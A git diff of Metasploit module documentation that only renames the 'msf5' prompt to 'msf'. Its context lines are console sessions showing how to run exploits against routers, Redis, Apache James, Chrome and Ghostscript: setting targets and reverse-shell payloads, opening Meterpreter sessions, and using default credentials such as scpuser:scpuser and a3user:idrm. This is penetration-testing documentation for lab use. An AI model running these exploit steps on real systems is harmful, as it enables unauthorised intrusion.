192.168.0.238 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238 LHOST => 192.168.0.238 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238 SRVHOST => 192.168.0.238 -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check [+] 192.168.0.1:20002 - The target is vulnerable. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > [*] Started reverse TCP handler on 192.168.0.238:4444 [*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726) [*] Starting up our web service on http://192.168.0.238:4445 ... @@ -85,7 +85,7 @@ msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > [*] Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:48112) at 2020-03-26 16:47:09 +0100 [*] Server stopped. -msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1 +msf exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1 [*] Starting interaction with 1... id diff --git a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md index 8bd20a399e..88023ccec6 100644 --- a/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md +++ b/documentation/modules/exploit/linux/redis/redis_replication_cmd_exec.md @@ -38,7 +38,7 @@ pre-compiled redis module to accomplish this exploit. ### set CUSTOM true (available only on linux) ``` -msf5 exploit(multi/redis/redis_replication_cmd_exec) > options +msf exploit(multi/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): @@ -67,9 +67,9 @@ Exploit target: 0 Automatic -msf5 exploit(multi/redis/redis_replication_cmd_exec) > set verbose false +msf exploit(multi/redis/redis_replication_cmd_exec) > set verbose false verbose => false -msf5 exploit(multi/redis/redis_replication_cmd_exec) > exploit +msf exploit(multi/redis/redis_replication_cmd_exec) > exploit [*] Started reverse TCP handler on 172.17.0.1:8080 [*] 127.0.0.1:6379 - Compile redis module extension file @@ -90,8 +90,8 @@ meterpreter > ### Set CUSTOM false (available on all system) ``` -msf5 > use exploit/linux/redis/redis_replication_cmd_exec -msf5 exploit(linux/redis/redis_replication_cmd_exec) > options +msf > use exploit/linux/redis/redis_replication_cmd_exec +msf exploit(linux/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): @@ -120,17 +120,17 @@ Exploit target: 0 Automatic -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226 +msf exploit(linux/redis/redis_replication_cmd_exec) > set rhosts 172.16.6.226 rhosts => 172.16.6.226 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1 +msf exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 172.16.6.1 srvhost => 172.16.6.1 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666 +msf exploit(linux/redis/redis_replication_cmd_exec) > set srvport 6666 srvport => 6666 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1 +msf exploit(linux/redis/redis_replication_cmd_exec) > set lhost 172.16.6.1 lhost => 172.16.6.1 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999 +msf exploit(linux/redis/redis_replication_cmd_exec) > set lport 9999 lport => 9999 -msf5 exploit(linux/redis/redis_replication_cmd_exec) > options +msf exploit(linux/redis/redis_replication_cmd_exec) > options Module options (exploit/linux/redis/redis_replication_cmd_exec): @@ -159,7 +159,7 @@ Exploit target: 0 Automatic -msf5 exploit(linux/redis/redis_replication_cmd_exec) > exploit +msf exploit(linux/redis/redis_replication_cmd_exec) > exploit [*] Started reverse TCP handler on 172.16.6.1:9999 [*] 172.16.6.226:6379 - Listening on 172.16.6.1:6666 diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md index c14a83515c..c08e127773 100644 --- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md @@ -40,36 +40,36 @@ __1.__ Load the module: ``` - msf5 > use exploit/linux/smtp/apache_james_exec + msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set target 1 + msf exploit(linux/smtp/apache_james_exec) > set target 1 target => 1 - msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169 + msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.169 rhosts => 192.168.224.169 - msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` - msf5 exploit(linux/smtp/apache_james_exec) > check + msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. - msf5 exploit(linux/smtp/apache_james_exec) > exploit + msf exploit(linux/smtp/apache_james_exec) > exploit [*] Started reverse TCP handler on 192.168.224.167:4444 [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload @@ -88,36 +88,36 @@ __1.__ Load the module: ``` - msf5 > use exploit/linux/smtp/apache_james_exec + msf > use exploit/linux/smtp/apache_james_exec ``` __2.__ Set remote and local options: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set target 0 + msf exploit(linux/smtp/apache_james_exec) > set target 0 target => 0 - msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 + msf exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164 rhosts => 192.168.224.164 - msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 + msf exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444 + msf exploit(linux/smtp/apache_james_exec) > set lport 4444 lport => 4444 ``` __3.__ Set payload: ``` - msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp ``` __4.__ Check version and run exploit: ``` - msf5 exploit(linux/smtp/apache_james_exec) > check + msf exploit(linux/smtp/apache_james_exec) > check [*] 192.168.224.164:25 - The target appears to be vulnerable. - msf5 exploit(linux/smtp/apache_james_exec) > exploit + msf exploit(linux/smtp/apache_james_exec) > exploit [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes) ``` @@ -125,15 +125,15 @@ __5.__ Set up and run listener (Can be done before running exploit): ``` - msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp + msf exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler + msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lport 4444 + msf exploit(multi/handler) > set lport 4444 lport => 4444 - msf5 exploit(multi/handler) > set lhost 192.168.224.167 + msf exploit(multi/handler) > set lhost 192.168.224.167 lhost => 192.168.224.167 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.224.167:4444 [*] Sending stage (3021284 bytes) to 192.168.224.164 diff --git a/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md b/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md index dbe778b0c4..a1f21ff3ab 100644 --- a/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md +++ b/documentation/modules/exploit/linux/snmp/awind_snmp_exec.md @@ -30,18 +30,18 @@ You should get a session. ## Scenarios ``` -msf5 > use exploit/linux/snmp/awind_snmp_exec -msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp +msf > use exploit/linux/snmp/awind_snmp_exec +msf exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp payload => linux/armle/meterpreter/reverse_tcp -msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2 +msf exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2 RHOSTS => 192.168.100.2 -msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1 +msf exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1 LHOST => 192.168.100.1 -msf5 exploit(linux/snmp/awind_snmp_exec) > check +msf exploit(linux/snmp/awind_snmp_exec) > check [*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6) [+] 192.168.100.2:161 The target is vulnerable. -msf5 exploit(linux/snmp/awind_snmp_exec) > run +msf exploit(linux/snmp/awind_snmp_exec) > run [*] Started reverse TCP handler on 192.168.100.1:4444 [*] Using URL: http://0.0.0.0:8080/u70HALC diff --git a/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md b/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md index 14a9b2d102..ecc1f8188a 100644 --- a/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md +++ b/documentation/modules/exploit/linux/ssh/cisco_ucs_scpuser.md @@ -14,12 +14,12 @@ was not tested with those products. Setup RHOST and run it! ``` -msf5 exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121 +msf exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser +msf exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121 rhost => 10.9.8.121 -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1 +msf exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1 lhost => 10.9.8.1 -msf5 exploit(linux/ssh/cisco_ucs_scpuser) > run +msf exploit(linux/ssh/cisco_ucs_scpuser) > run [*] 10.9.8.121:22 - Attempt to login to the Cisco appliance... [+] 10.9.8.121:22 - Login Successful (scpuser:scpuser) diff --git a/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md b/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md index efb9970726..c2eb62d920 100644 --- a/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md +++ b/documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md @@ -21,7 +21,7 @@ Module defaults work very well, you should just need to set `RHOSTS`! A successful exploit will look like this: ``` -msf5 exploit(linux/ssh/ibm_drm_a3user) > run +msf exploit(linux/ssh/ibm_drm_a3user) > run [*] 10.22.22.212:22 - Attempting to login to the IBM Data Risk Manager appliance... [+] 10.22.22.212:22 - Login Successful (a3user:idrm) [*] Found shell. diff --git a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md index df5aed382a..2d4e2947dc 100644 --- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md +++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md @@ -82,10 +82,10 @@ You can leave this blank to use the default password. As a normal user: ``` -msf5 > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 +msf > use exploit/linux/telnet/netgear_telnetenable +msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 rhost => 192.168.1.1 -msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1 +msf exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1 [*] exec: ping -c 1 192.168.1.1 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. @@ -94,13 +94,13 @@ PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. --- 192.168.1.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 2.041/2.041/2.041/0.000 ms -msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1 +msf exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1 [*] exec: arp -an 192.168.1.1 ? (192.168.1.1) at [redacted] [ether] on wlan0 -msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted] +msf exploit(linux/telnet/netgear_telnetenable) > set mac [redacted] mac => [redacted] -msf5 exploit(linux/telnet/netgear_telnetenable) > run +msf exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:password @@ -125,10 +125,10 @@ Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7 As root: ``` -msf5 > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 +msf > use exploit/linux/telnet/netgear_telnetenable +msf exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 rhost => 192.168.1.1 -rmsf5 exploit(linux/telnet/netgear_telnetenable) > run +rmsf exploit(linux/telnet/netgear_telnetenable) > run [+] 192.168.1.1:23 - Detected telnetenabled on UDP [*] 192.168.1.1:23 - Attempting to discover MAC address via ARP diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md index 8a7bfaa720..72bdcdb6ef 100644 --- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md +++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md @@ -29,7 +29,7 @@ for Crock-Pot and 49153 for other devices. ## Usage ``` -msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run +msf exploit(linux/upnp/belkin_wemo_upnp_exec) > run [*] Started reverse TCP handler on 10.22.22.4:4444 [+] Wemo-enabled device detected diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md index 9f82391e6a..5155d8b664 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md @@ -32,7 +32,7 @@ that triggers the vulnerability. ### D-link DIR-859 Firmware 1.05 ``` -msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run +msf exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://0.0.0.0:8080/38YWEX2 [*] Local IP: http://192.168.70.28:8080/38YWEX2 diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md index 6b9c091430..1b80a37db7 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_subscribe_exec.md @@ -20,7 +20,7 @@ Get a D-Link DIR-859 router (or [any of the devices/firmware versions mentioned ### D-link DIR-859 Firmware 1.05 ``` -msf5 exploit(linux/http/dlink_dir859_exec_telnet) > run +msf exploit(linux/http/dlink_dir859_exec_telnet) > run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Using URL: http://192.168.0.2:8080/r2hOQycyVvN2BP diff --git a/documentation/modules/exploit/multi/browser/chrome_array_map.md b/documentation/modules/exploit/multi/browser/chrome_array_map.md index abaa37582f..ef855cac92 100644 --- a/documentation/modules/exploit/multi/browser/chrome_array_map.md +++ b/documentation/modules/exploit/multi/browser/chrome_array_map.md @@ -32,19 +32,19 @@ Start Google Chrome without a sandbox: ```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` ``` -msf5 > use exploit/multi/browser/chrome_array_map -msf5 exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1 +msf > use exploit/multi/browser/chrome_array_map +msf exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_array_map) > set URIPATH / +msf exploit(multi/browser/chrome_array_map) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_array_map) > run +msf exploit(multi/browser/chrome_array_map) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_array_map) > +msf exploit(multi/browser/chrome_array_map) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. @@ -52,7 +52,7 @@ msf5 exploit(multi/browser/chrome_array_map) > [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800 -msf5 exploit(multi/browser/chrome_array_map) > sessions 1 +msf exploit(multi/browser/chrome_array_map) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md b/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md index 73b1815c0c..c3eed392ae 100644 --- a/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md +++ b/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md @@ -34,29 +34,29 @@ Start Google Chrome without a sandbox: ```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` ``` -msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH / +msf > use exploit/multi/browser/chrome_jscreate_sideeffect +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit +msf exploit(multi/browser/chrome_jscreate_sideeffect) > exploit [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > +msf exploit(multi/browser/chrome_jscreate_sideeffect) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > +msf exploit(multi/browser/chrome_jscreate_sideeffect) > [*] 192.168.56.3 chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800 -msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1 +msf exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/multi/browser/chrome_object_create.md b/documentation/modules/exploit/multi/browser/chrome_object_create.md index fe4094b78d..c895cfa4b7 100755 --- a/documentation/modules/exploit/multi/browser/chrome_object_create.md +++ b/documentation/modules/exploit/multi/browser/chrome_object_create.md @@ -53,19 +53,19 @@ Start Google Chrome without a sandbox: `"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` -msf5 > use exploit/multi/browser/chrome_object_create -msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 +msf > use exploit/multi/browser/chrome_object_create +msf exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 SRVHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_object_create) > set URIPATH / +msf exploit(multi/browser/chrome_object_create) > set URIPATH / URIPATH => / -msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp +msf exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 +msf exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 -msf5 exploit(multi/browser/chrome_object_create) > run +msf exploit(multi/browser/chrome_object_create) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. -msf5 exploit(multi/browser/chrome_object_create) > +msf exploit(multi/browser/chrome_object_create) > [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Using URL: http://192.168.56.1:8080/ [*] Server started. @@ -73,7 +73,7 @@ msf5 exploit(multi/browser/chrome_object_create) > [*] Sending stage (206403 bytes) to 192.168.56.3 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800 -msf5 exploit(multi/browser/chrome_object_create) > sessions 1 +msf exploit(multi/browser/chrome_object_create) > sessions 1 [*] Starting interaction with 1... meterpreter > pwd diff --git a/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md b/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md index 631bb6c20d..09b1ae6b2e 100644 --- a/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md +++ b/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md @@ -37,29 +37,29 @@ Start Google Chrome without a sandbox, e.g: `"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` -msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow +msf > use exploit/multi/browser/chrome_simplifiedlowering_overflow [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80 srvport => 80 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath / +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath / uripath => / -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1 srvhost => 127.0.0.1 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1 lhost => 127.0.0.1 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:4444 -msf5 exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/ +msf exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/ [*] Server started. [*] 127.0.0.1 chrome_simplifiedlowering_overflow - Sending /index.html to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 [*] Sending stage (3012516 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44046) at 2021-04-06 16:33:05 +0530 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1 [*] Starting interaction with 1... meterpreter > diff --git a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md index b37b55b3dd..98bb8158f5 100644 --- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md +++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md @@ -67,19 +67,19 @@ Options unique for this module is described below. ### Through the victim's browser ``` - msf5 > use exploit/multi/browser/msfd_rce_browser - msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp + msf > use exploit/multi/browser/msfd_rce_browser + msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp payload => ruby/shell_reverse_tcp - msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17 + msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17 lhost => 192.168.0.17 - msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443 + msf exploit(multi/browser/msfd_rce_browser) > set lport 443 lport => 443 - msf5 exploit(multi/browser/msfd_rce_browser) > exploit + msf exploit(multi/browser/msfd_rce_browser) > exploit [*] Exploit running as background job 0. [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 - msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL: + msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL: http://0.0.0.0:8080/J5ras6oYftFWW4 [*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4 [*] Server started. diff --git a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md index c3fbd3b531..e7b0b70b1d 100644 --- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md +++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md @@ -43,24 +43,24 @@ ## Scenarios ``` - msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash + msf > use exploit/multi/fileformat/evince_cbt_cmd_injection + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188 + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > run [*] Writing file: msf.cbt (1078272 bytes) ... [+] msf.cbt stored at /root/.msf4/local/msf.cbt - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www [*] exec: mv /root/.msf4/local/msf.cbt /var/www - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler + msf exploit(multi/handler) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash - msf5 exploit(multi/handler) > set lhost 172.16.191.188 + msf exploit(multi/handler) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500 diff --git a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md index 205229820b..039338515f 100644 --- a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md +++ b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md @@ -43,20 +43,20 @@ Set this to a writable directory without `noexec`. ## Usage ``` -msf5 > use exploit/multi/fileformat/ghostscript_failed_restore -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set target Linux (Dropper) +msf > use exploit/multi/fileformat/ghostscript_failed_restore +msf exploit(multi/fileformat/ghostscript_failed_restore) > set target Linux (Dropper) target => Linux (Dropper) -msf5 